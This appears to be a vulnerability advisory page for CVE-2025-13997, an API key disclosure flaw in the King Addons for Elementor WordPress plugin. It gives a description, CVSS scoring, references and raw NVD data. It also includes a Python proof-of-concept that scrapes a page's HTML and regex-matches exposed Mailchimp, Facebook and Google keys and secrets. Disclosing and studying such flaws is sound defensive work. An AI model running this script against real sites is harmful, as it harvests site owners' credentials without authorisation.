Security Vulnerability Report
CVE-2025-13997 CVSS 5.3 MEDIUM

CVE-2025-13997

Published: 2026-03-23 07:16:05
Last Modified: 2026-04-24 16:32:54

Description

The King Addons for Elementor – 4,000+ ready Elementor sections, 650+ templates, 70+ FREE widgets for Elementor plugin for WordPress is vulnerable to unauthenticated API key disclosure in all versions up to, and including, 51.1.49 because the plugin writes the API keys into the HTML source code via the render_full_form function. This makes it possible for unauthenticated attackers to extract the site's Mailchimp, Facebook and Google API keys and secrets. This vulnerability requires the Premium license to be installed.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

King Addons for Elementor <= 51.1.49

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re

import requests


def check_vulnerability(url):
    """
    PoC to check for CVE-2025-13997.
    Fetches the HTML source and looks for exposed API keys.
    """
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            content = response.text
            # Common patterns for API keys in the source code
            patterns = {
                'Mailchimp': r'mailchimp[_-]?api[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9-]+)',
                'Facebook': r'fb[_-]?app[_-]?secret["\']?\s*[:=]\s*["\']?([a-zA-Z0-9]+)',
                'Google': r'google[_-]?api[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9_-]+)',
            }
            found = False
            for service, pattern in patterns.items():
                match = re.search(pattern, content, re.IGNORECASE)
                if match:
                    print(f"[+] Potential {service} API Key found: {match.group(1)}")
                    found = True
            if not found:
                print("[-] No exposed API keys detected in the HTML source.")
        else:
            print(f"[-] HTTP Error: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target_url = "http://target-site.com/page-with-form"
    check_vulnerability(target_url)
```

References

- https://plugins.trac.wordpress.org/browser/king-addons/tags/51.1.38/includes/widgets/Login_Register_Form/Login_Register_Form.php#L3065
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7955b162-ed0f-4455-a429-ed292771c701?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13997",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T07:16:05.003",
    "lastModified": "2026-04-24T16:32:53.997",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The King Addons for Elementor – 4,000+ ready Elementor sections, 650+ templates, 70+ FREE widgets for Elementor plugin for WordPress is vulnerable to unauthenticated API key disclosure in all versions up to, and including, 51.1.49 due to the plugin adding the API keys to the HTML source code via render_full_form function. This makes it possible for unauthenticated attackers to extract site's Mailchimp, Facebook and Google API keys and secrets.\r\nThis vulnerability requires the Premium license to be installed"
      },
      {
        "lang": "es",
        "value": "Los King Addons para Elementor – más de 4.000 secciones de Elementor listas, más de 650 plantillas, más de 70 widgets GRATUITOS para el plugin Elementor para WordPress es vulnerable a la divulgación de claves API no autenticadas en todas las versiones hasta la 51.1.49, inclusive, debido a que el plugin añade las claves API al código fuente HTML a través de la función render_full_form. Esto hace posible que atacantes no autenticados extraigan las claves y secretos API de Mailchimp, Facebook y Google del sitio. \r\nEsta vulnerabilidad requiere que la licencia Premium esté instalada."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-200"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/king-addons/tags/51.1.38/includes/widgets/Login_Register_Form/Login_Register_Form.php#L3065",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7955b162-ed0f-4455-a429-ed292771c701?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```